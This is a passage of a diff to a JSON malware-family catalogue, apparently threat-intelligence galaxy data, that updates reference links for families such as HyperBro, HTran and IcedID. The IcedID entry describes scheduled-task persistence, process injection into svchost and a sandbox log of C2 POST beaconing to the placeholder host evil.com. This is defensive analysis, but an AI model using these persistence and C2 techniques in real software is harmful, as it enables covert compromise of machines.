- "https://mp.weixin.qq.com/s/gWOIRNPLVqX761LW8x-S5g",
- "https://threatpost.com/ta2541-apt-rats-aviation/178422/",
- "https://www.binarydefense.com/revenge-is-a-dish-best-served-obfuscated",
"https://github.com/jeFF0Falltrades/IoCs/blob/master/Broadbased/wsh_rat.md",
- "https://yoroi.company/research/threatening-within-budget-how-wsh-rat-is-abused-by-cyber-crooks/",
- "https://blogs.360.cn/post/APT-C-44.html",
- "https://blog.talosintelligence.com/2021/09/operation-layover-how-we-tracked-attack.html",
- "https://cybersecurity.att.com/blogs/labs-research/alien-labs-2019-analysis-of-threat-groups-molerats-and-apt-c-37",
- "http://blogs.360.cn/post/analysis-of-apt-c-37.html",
- "https://isc.sans.edu/forums/diary/Houdini+is+Back+Delivered+Through+a+JavaScript+Dropper/28746/",
+ "https://mp.weixin.qq.com/s/gWOIRNPLVqX761LW8x-S5g",
+ "https://www.youtube.com/watch?v=XDAiS6KBDOs",
"https://www.bleepingcomputer.com/news/security/unskilled-hacker-linked-to-years-of-attacks-on-aviation-transport-sectors/",
- "https://www.deepinstinct.com/blog/understanding-the-windows-javascript-threat-landscape"
+ "https://blogs.360.cn/post/APT-C-44.html",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
+ "https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/",
+ "https://unit42.paloaltonetworks.com/unit42-houdinis-magic-reappearance/",
+ "https://www.youtube.com/watch?v=h3KLKCdMUUY",
+ "https://cofense.com/houdini-worm-transformed-new-phishing-attack/",
+ "https://www.binarydefense.com/revenge-is-a-dish-best-served-obfuscated",
+ "https://threatpost.com/ta2541-apt-rats-aviation/178422/",
+ "https://www.trellix.com/en-us/about/newsroom/stories/research/cyberattacks-targeting-ukraine-increase.html",
+ "https://about.fb.com/news/2021/04/taking-action-against-hackers-in-palestine/",
+ "https://www.fireeye.com/blog/threat-research/2013/09/now-you-see-me-h-worm-by-houdini.html",
+ "https://blog.morphisec.com/ahk-rat-loader-leveraged-in-unique-delivery-campaigns",
+ "https://www.deepinstinct.com/blog/understanding-the-windows-javascript-threat-landscape",
+ "https://www.vectra.ai/blogpost/moonlight-middle-east-targeted-attacks",
+ "https://isc.sans.edu/forums/diary/Houdini+is+Back+Delivered+Through+a+JavaScript+Dropper/28746/",
+ "http://blogs.360.cn/post/analysis-of-apt-c-37.html",
+ "https://yoroi.company/research/threatening-within-budget-how-wsh-rat-is-abused-by-cyber-crooks/",
+ "https://myonlinesecurity.co.uk/more-agenttesla-keylogger-and-nanocore-rat-in-one-bundle/",
+ "http://blog.morphisec.com/hworm-houdini-aka-njrat",
+ "https://cybersecurity.att.com/blogs/labs-research/alien-labs-2019-analysis-of-threat-groups-molerats-and-apt-c-37",
+ "https://blog.talosintelligence.com/2021/09/operation-layover-how-we-tracked-attack.html"
],
"synonyms": [
"Hworm",
@@ -26666,32 +28178,23 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.htran",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/",
"https://www.fireeye.com/blog/threat-research/2021/09/proxyshell-exploiting-microsoft-exchange-servers.html",
- "https://www.secureworks.com/research/threat-profiles/bronze-atlas",
- "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers",
+ "https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/",
+ "https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf",
+ "https://www.secureworks.com/research/htran",
"https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/",
"https://www.secureworks.com/research/threat-profiles/bronze-mayfair",
- "https://www.secureworks.com/research/htran",
- "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/",
- "https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/",
- "https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf"
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
+ "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers",
+ "https://www.secureworks.com/research/threat-profiles/bronze-atlas",
+ "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/"
],
"synonyms": [
"HUC Packet Transmit Tool"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "f3bfe513-2a65-49b5-9d64-a66541dce697",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "3fb18a77-91ef-4c68-a9a9-fa6bdbea38e8",
"value": "HTran"
},
@@ -26700,27 +28203,18 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.httpbrowser",
- "https://threatconnect.com/blog/the-anthem-hack-all-roads-lead-to-china/",
+ "https://attack.mitre.org/groups/G0026",
"https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf",
- "https://www.threatconnect.com/blog/threatconnect-discovers-chinese-apt-activity-in-europe/",
"https://www.secureworks.com/research/threat-profiles/bronze-union",
- "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/may/emissary-panda-a-potential-new-malicious-tool/",
- "https://attack.mitre.org/groups/G0026"
+ "https://www.threatconnect.com/blog/threatconnect-discovers-chinese-apt-activity-in-europe/",
+ "https://threatconnect.com/blog/the-anthem-hack-all-roads-lead-to-china/",
+ "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/may/emissary-panda-a-potential-new-malicious-tool/"
],
"synonyms": [
"HttpDump"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "08e2c9ef-aa62-429f-a6e5-e901ff6883cd",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "79f93d04-f6c8-4705-9395-7f575a61e82f",
"value": "HttpBrowser"
},
@@ -26729,9 +28223,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.httpdropper",
- "https://www.sans.org/reading-room/whitepapers/critical/tracing-lineage-darkseoul-36787",
+ "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2013/dissecting-operation-troy.pdf",
"http://www.malware-reversing.com/2013/04/5-south-korea-incident-new-malware.html",
- "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2013/dissecting-operation-troy.pdf"
+ "https://www.sans.org/reading-room/whitepapers/critical/tracing-lineage-darkseoul-36787"
],
"synonyms": [
"httpdr0pper"
@@ -26760,9 +28254,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.hui_loader",
- "https://blogs.jpcert.or.jp/ja/2022/05/HUILoader.html",
"https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader",
- "https://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_9_yanagishita-tamada-nakatsuru-ishimaru_en.pdf"
+ "https://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_9_yanagishita-tamada-nakatsuru-ishimaru_en.pdf",
+ "https://blogs.jpcert.or.jp/ja/2022/05/HUILoader.html"
],
"synonyms": [],
"type": []
@@ -26796,6 +28290,19 @@
"uuid": "40157734-eb33-4187-bcc8-2cd168db6fda",
"value": "Hupigon"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.huskloader",
+ "https://twitter.com/SethKingHi/status/1612377098777133057"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "06649edb-d078-4403-a628-6295d1bc4ad8",
+ "value": "HuskLoader"
+ },
{
"description": "",
"meta": {
@@ -26831,45 +28338,37 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.hyperbro",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/h/iron-tiger-compromises-chat-application-mimi,-targets-windows,-mac,-and-linux-users/IOCs-IronTiger-compromises-chat-application-mimi-targets-windows-mac-linux-users.txt",
- "https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf",
- "https://blog.team-cymru.com/2020/03/25/how-the-iranian-cyber-security-agency-detects-emissary-panda-malware/",
- "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia",
- "https://web.archive.org/web/20200307113010/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947864.pdf",
- "https://www.secureworks.com/research/threat-profiles/bronze-union",
- "https://vblocalhost.com/uploads/VB2020-Shank-Piccolini.pdf",
- "https://team-cymru.com/2020/03/25/how-the-iranian-cyber-security-agency-detects-emissary-panda-malware/",
- "https://www.tra.gov.ae/assets/mTP39Tp6.pdf.aspx",
- "https://www.sstic.org/media/SSTIC2020/SSTIC-actes/pivoter_tel_bernard_ou_comment_monitorer_des_attaq/SSTIC2020-Slides-pivoter_tel_bernard_ou_comment_monitorer_des_attaquants_ngligents-lunghi.pdf",
- "https://blog.sekoia.io/luckymouse-uses-a-backdoored-electron-app-to-target-macos/",
- "https://www.verfassungsschutz.de/SharedDocs/publikationen/DE/cyberabwehr/2022-01-bfv-cyber-brief.pdf?__blob=publicationFile&v=10",
- "https://www.fireeye.com/blog/threat-research/2021/08/unc215-chinese-espionage-campaign-in-israel.html",
- "https://www.mandiant.com/resources/unc215-chinese-espionage-campaign-in-israel",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/",
- "https://www.bleepingcomputer.com/news/security/german-govt-warns-of-apt27-hackers-backdooring-business-networks/",
- "https://www.trendmicro.com/en_us/research/22/h/irontiger-compromises-chat-app-Mimi-targets-windows-mac-linux-users.html",
- "http://www.talent-jump.com/article/2020/02/17/CLAMBLING-A-New-Backdoor-Base-On-Dropbox-en/",
"https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-drbcontrol-uncovering-a-cyberespionage-campaign-targeting-gambling-companies-in-southeast-asia",
+ "https://www.fireeye.com/blog/threat-research/2021/08/unc215-chinese-espionage-campaign-in-israel.html",
+ "https://www.secureworks.com/research/threat-profiles/bronze-union",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/h/iron-tiger-compromises-chat-application-mimi,-targets-windows,-mac,-and-linux-users/IOCs-IronTiger-compromises-chat-application-mimi-targets-windows-mac-linux-users.txt",
"https://securelist.com/luckymouse-hits-national-data-center/86083/",
+ "https://www.bleepingcomputer.com/news/security/german-govt-warns-of-apt27-hackers-backdooring-business-networks/",
"https://www.secureworks.com/research/a-peek-into-bronze-unions-toolbox",
"https://www.trendmicro.com/en_us/research/21/d/iron-tiger-apt-updates-toolkit-with-evolved-sysupdate-malware-va.html",
"https://cyware.com/news/apt27-group-targets-german-organizations-with-hyperbro-2c43b7cf/",
- "https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop",
+ "https://www.trendmicro.com/en_us/research/22/h/irontiger-compromises-chat-app-Mimi-targets-windows-mac-linux-users.html",
+ "https://blog.sekoia.io/luckymouse-uses-a-backdoored-electron-app-to-target-macos/",
+ "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/",
+ "http://www.talent-jump.com/article/2020/02/17/CLAMBLING-A-New-Backdoor-Base-On-Dropbox-en/",
+ "https://www.tra.gov.ae/assets/mTP39Tp6.pdf.aspx",
+ "https://team-cymru.com/2020/03/25/how-the-iranian-cyber-security-agency-detects-emissary-panda-malware/",
+ "https://www.intrinsec.com/apt27-analysis/",
+ "https://www.sstic.org/media/SSTIC2020/SSTIC-actes/pivoter_tel_bernard_ou_comment_monitorer_des_attaq/SSTIC2020-Slides-pivoter_tel_bernard_ou_comment_monitorer_des_attaquants_ngligents-lunghi.pdf",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/",
+ "https://blog.team-cymru.com/2020/03/25/how-the-iranian-cyber-security-agency-detects-emissary-panda-malware/",
+ "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia",
+ "https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf",
"https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/",
- "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/"
+ "https://vblocalhost.com/uploads/VB2020-Shank-Piccolini.pdf",
+ "https://web.archive.org/web/20200307113010/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947864.pdf",
+ "https://www.verfassungsschutz.de/SharedDocs/publikationen/DE/cyberabwehr/2022-01-bfv-cyber-brief.pdf?__blob=publicationFile&v=10",
+ "https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop",
+ "https://www.mandiant.com/resources/unc215-chinese-espionage-campaign-in-israel"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "e1bfe1d9-190c-4cf4-aec8-a8f2c41c7d8b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "b7f1abd3-870b-42ca-9bd1-5931126c68d5",
"value": "HyperBro"
},
@@ -26891,17 +28390,19 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.hyperssl",
- "https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf",
- "https://www.fireeye.com/blog/threat-research/2021/08/unc215-chinese-espionage-campaign-in-israel.html",
- "https://www.mandiant.com/resources/unc215-chinese-espionage-campaign-in-israel",
+ "https://www.trendmicro.com/en_us/research/21/d/iron-tiger-apt-updates-toolkit-with-evolved-sysupdate-malware-va.html",
"https://www.sstic.org/media/SSTIC2021/SSTIC-actes/Taking_Advantage_of_PE_Metadata_or_How_To_Complete/SSTIC2021-Article-Taking_Advantage_of_PE_Metadata_or_How_To_Complete_your_Favorite_Threat_Actor_Sample_Collection-lunghi.pdf",
- "https://web.archive.org/web/20200307113010/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947864.pdf",
+ "https://www.fireeye.com/blog/threat-research/2021/08/unc215-chinese-espionage-campaign-in-israel.html",
+ "https://www.sstic.org/media/SSTIC2021/SSTIC-actes/Taking_Advantage_of_PE_Metadata_or_How_To_Complete/SSTIC2021-Slides-Taking_Advantage_of_PE_Metadata_or_How_To_Complete_your_Favorite_Threat_Actor_Sample_Collection-lunghi.pdf",
"https://www.tra.gov.ae/assets/mTP39Tp6.pdf.aspx",
"https://vblocalhost.com/uploads/VB2020-Shank-Piccolini.pdf",
- "https://www.trendmicro.com/en_us/research/21/d/iron-tiger-apt-updates-toolkit-with-evolved-sysupdate-malware-va.html",
- "https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/",
- "https://www.sstic.org/media/SSTIC2021/SSTIC-actes/Taking_Advantage_of_PE_Metadata_or_How_To_Complete/SSTIC2021-Slides-Taking_Advantage_of_PE_Metadata_or_How_To_Complete_your_Favorite_Threat_Actor_Sample_Collection-lunghi.pdf",
- "https://norfolkinfosec.com/emissary-panda-dll-backdoor/"
+ "https://web.archive.org/web/20200307113010/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947864.pdf",
+ "https://norfolkinfosec.com/emissary-panda-dll-backdoor/",
+ "https://www.trendmicro.com/en_us/research/23/c/iron-tiger-sysupdate-adds-linux-targeting.html",
+ "https://www.mandiant.com/resources/unc215-chinese-espionage-campaign-in-israel",
+ "https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf",
+ "https://twitter.com/ESETresearch/status/1594937054303236096",
+ "https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/"
],
"synonyms": [
"FOCUSFJORD",
@@ -26911,151 +28412,209 @@
"type": []
},
"uuid": "84f43641-77bc-4dcb-a104-150e8574da22",
- "value": "HyperSSL"
+ "value": "HyperSSL (Windows)"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hzrat",
+ "https://medium.com/@DCSO_CyTec/hz-rat-goes-china-506854c5f2e2"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "eaaebc38-73d8-48b7-9927-2d2523870795",
+ "value": "HZ RAT"
+ },
+ {
+ "description": "Icarus is a modular stealer software, written in .NET. One module is the open source r77 rootkit.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.icarus",
+ "https://twitter.com/struppigel/status/1566685309093511170"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "8f1225ba-a636-488b-a288-ab777708a205",
+ "value": "Icarus"
},
{
"description": "Analysis Observations:\r\n\r\n* It sets up persistence by creating a Scheduled Task with the following characteristics:\r\n * Name: Update\r\n * Trigger: At Log on\r\n * Action: %LocalAppData%\\$Example\\\\waroupada.exe /i\r\n * Conditions: Stop if the computer ceases to be idle.\r\n* The sub-directory within %LocalAppdata%, Appears to be randomly picked from the list of directories within %ProgramFiles%. This needs more verification.\r\n* The filename remained static during analysis.\r\n* The original malware exe (ex. waroupada.exe) will spawn an instance of svchost.exe as a sub-process and then inject/execute its malicious code within it\r\n* If “/i” is not passed as an argument, it sets up persistence and waits for reboot.\r\n* If “/I” is passed as an argument (as is the case when the scheduled task is triggered at login), it skips persistence setup and actually executes; resulting in C2 communication.\r\n* Employs an interesting method for sleeping by calling the Sleep function of kernel32.dll from the shell, like so:\r\n rundll32.exe kernel32,Sleep -s\r\n* Setup a local listener to proxy traffic on 127.0.0.1:50000\r\n\r\n**[Example Log from C2 Network Communication]**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] connect\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: POST /forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11 HTTP/1.1\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Connection: close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Type: application/x-www-form-urlencoded\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Length: 196\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Host: evil.com\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: <(POSTDATA)>\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: POST data stored to: /var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: **Request URL: hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending fake file configured for extension 'php'.\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: HTTP/1.1 200 OK\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Type: text/html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Server: INetSim HTTPs Server\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Date: Mon, 19 Mar 2018 16:45:55 GMT\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Connection: Close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Length: 258\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending file: /var/lib/inetsim/http/fakefiles/sample.html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] stat: 1 **method=POST url=hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11** sent=/var/lib/inetsim/http/fakefiles/sample.html postdata=/var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid",
- "https://thedfirreport.com/2021/06/20/from-word-to-lateral-movement-in-1-hour/",
- "https://medium.com/walmartglobaltech/icedid-leverages-privateloader-7744771bf87f",
- "https://twitter.com/felixw3000/status/1521816045769662468",
- "https://malwation.com/icedid-malware-technical-analysis-report/",
- "https://thedfirreport.com/2021/05/12/conti-ransomware/",
- "https://tccontre.blogspot.com/2021/01/",
- "https://therecord.media/meet-prometheus-the-secret-tds-behind-some-of-todays-malware-campaigns/",
- "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/",
- "https://blogs.vmware.com/security/2021/07/hunting-icedid-and-unpacking-automation-with-qiling.html",
- "https://blog.malwarebytes.com/threat-analysis/2019/12/new-version-of-icedid-trojan-uses-steganographic-payloads/",
- "https://blog.reversinglabs.com/blog/code-reuse-across-packers-and-dll-loaders",
- "https://zero2auto.com/2020/06/22/unpacking-visual-basic-packers/",
- "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/",
- "https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html",
- "https://www.intezer.com/blog/research/conversation-hijacking-campaign-delivering-icedid/",
- "https://blog.cyberint.com/icedid-stealer-man-in-the-browser-banking-trojan",
- "https://team-cymru.com/blog/2021/05/19/tracking-bokbot-infrastructure/",
- "https://securelist.com/malicious-spam-campaigns-delivering-banking-trojans/102917",
- "https://gist.github.com/psrok1/e6bf5851d674edda03a201e7f24a5e6b",
- "https://blog.minerva-labs.com/icedid-maas",
- "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/",
- "https://www.trendmicro.com/en_us/research/21/d/a-spike-in-bazarcall-and-icedid-activity.html",
- "https://medium.com/@dawid.golak/icedid-aka-bokbot-analysis-with-ghidra-560e3eccb766",
- "https://awakesecurity.com/blog/detecting-icedid-and-cobalt-strike-beacon-with-network-detection-and-response/",
- "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
- "https://threatresearch.ext.hp.com/detecting-ta551-domains/",
- "https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire",
- "https://www.cynet.com/attack-techniques-hands-on/shelob-moonlight-spinning-a-larger-web/",
- "https://netresec.com/?b=214d7ff",
- "https://tccontre.blogspot.com/2020/08/learning-from-iceid-loader-including.html",
- "https://blog.group-ib.com/prometheus-tds",
- "https://blog.reconinfosec.com/an-encounter-with-ta551-shathak",
- "https://www.fortinet.com/blog/threat-research/icedid-malware-analysis-part-one.html",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://www.binarydefense.com/icedid-gziploader-analysis/",
- "https://securityintelligence.com/icedid-banking-trojan-spruces-up-injection-tactics-to-add-stealth/",
- "https://www.fortinet.com/blog/threat-research/icedid-malware-analysis-part-two.html",
- "https://isc.sans.edu/diary/28636",
- "https://news.sophos.com/en-us/2020/02/18/nearly-a-quarter-of-malware-now-communicates-using-tls/",
- "https://www.crowdstrike.com/blog/bokbots-man-in-the-browser-overview/",
- "https://www.mimecast.com/globalassets/documents/whitepapers/taa551-treatresearch_final-1.15.21.pdf",
- "https://www.trendmicro.com/en_us/research/21/j/ransomware-operators-found-using-new-franchise-business-model.html",
- "https://securityintelligence.com/posts/trickbot-group-systematically-attacking-ukraine",
- "https://go.recordedfuture.com/hubfs/reports/cta-2021-1112.pdf",
- "http://www.intezer.com/icedid-banking-trojan-shares-code-pony-2-0-trojan/",
- "https://github.com/telekom-security/icedid_analysis",
- "https://www.uptycs.com/blog/icedid-campaign-spotted-being-spiced-with-excel-4-macros",
- "https://kienmanowar.wordpress.com/2020/08/16/manual-unpacking-icedid-write-up/",
- "https://www.youtube.com/watch?v=wObF9n2UIAM",
- "https://unit42.paloaltonetworks.com/atoms/monsterlibra/",
- "https://blogs.juniper.net/en-us/threat-research/iceid-campaign-strikes-back",
- "https://www.vkremez.com/2018/09/lets-learn-deeper-dive-into.html",
- "https://www.nri-secure.co.jp/blog/explaining-the-tendency-of-malware-icedid",
- "https://blog.talosintelligence.com/2020/07/valak-emerges.html",
- "https://documents.trendmicro.com/assets/rpt/rpt-navigating-new-frontiers-trend-micro-2021-annual-cybersecurity-report.pdf",
- "https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240",
- "https://www.f5.com/labs/articles/threat-intelligence/icedid-banking-trojan-uses-covid-19-pandemic-to-lure-new-victims",
- "https://securityintelligence.com/icedid-operators-using-atsengine-injection-panel-to-hit-e-commerce-sites/",
- "https://www.socinvestigation.com/icedid-banking-trojan-returns-with-new-ttps-detection-response/",
- "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
- "https://nikpx.github.io/malware/analysis/2022/03/09/BokBot",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://www.youtube.com/watch?v=oZ4bwnjcXWg",
- "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf",
- "https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/",
- "https://www.youtube.com/watch?v=YEqLIR6hfOM",
- "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx",
- "https://www.youtube.com/watch?v=wMXD4Sv1Alw",
- "https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware",
- "https://elis531989.medium.com/funtastic-packers-and-where-to-find-them-41429a7ef9a7",
- "https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf",
- "https://team-cymru.com/blog/2021/11/03/webinject-panel-administration-a-vantage-point-into-multiple-threat-actor-campaigns/",
- "https://www.youtube.com/watch?v=7Dk7NkIbVqY",
- "https://www.bleepingcomputer.com/news/security/microsoft-exchange-targeted-for-icedid-reply-chain-hijacking-attacks/",
- "https://blogs.juniper.net/en-us/threat-research/covid-19-and-fmla-campaigns-used-to-install-new-icedid-banking-malware",
- "https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html",
- "https://intel471.com/blog/malware-before-ransomware-trojan-information-stealer-cobalt-strike",
- "https://www.fortinet.com/blog/threat-research/spoofed-invoice-drops-iced-id",
"https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf",
- "https://research.checkpoint.com/2021/melting-ice-tracking-icedid-servers-with-a-few-simple-steps/",
- "https://digitalguardian.com/blog/iceid-banking-trojan-targeting-banks-payment-card-providers-e-commerce-sites",
- "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
- "https://isc.sans.edu/diary/IcedID+%28Bokbot%29+with+Dark+VNC+and+Cobalt+Strike/28884",
- "https://intel471.com/blog/conti-emotet-ransomware-conti-leaks",
- "https://www.bleepingcomputer.com/news/security/hackers-target-ukrainian-govt-with-icedid-malware-zimbra-exploits/",
- "https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/",
- "https://isc.sans.edu/forums/diary/TA551+Shathak+pushes+IcedID+Bokbot/28092/",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://www.microsoft.com/security/blog/2020/12/09/edr-in-block-mode-stops-icedid-cold/",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
- "https://eln0ty.github.io/malware%20analysis/IcedID/",
- "https://www.group-ib.com/blog/icedid",
- "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
- "https://www.fortinet.com/blog/threat-research/deep-dive-icedid-malware-analysis-of-child-processes.html",
- "https://blog.bushidotoken.net/2022/04/lessons-from-conti-leaks.html",
- "https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/",
- "https://thedfirreport.com/2021/07/19/icedid-and-cobalt-strike-vs-antivirus/",
- "https://www.microsoft.com/security/blog/2021/04/09/investigating-a-unique-form-of-email-delivery-for-icedid-malware/",
- "https://threatpost.com/exchange-servers-speared-in-icedid-phishing-campaign/179137/",
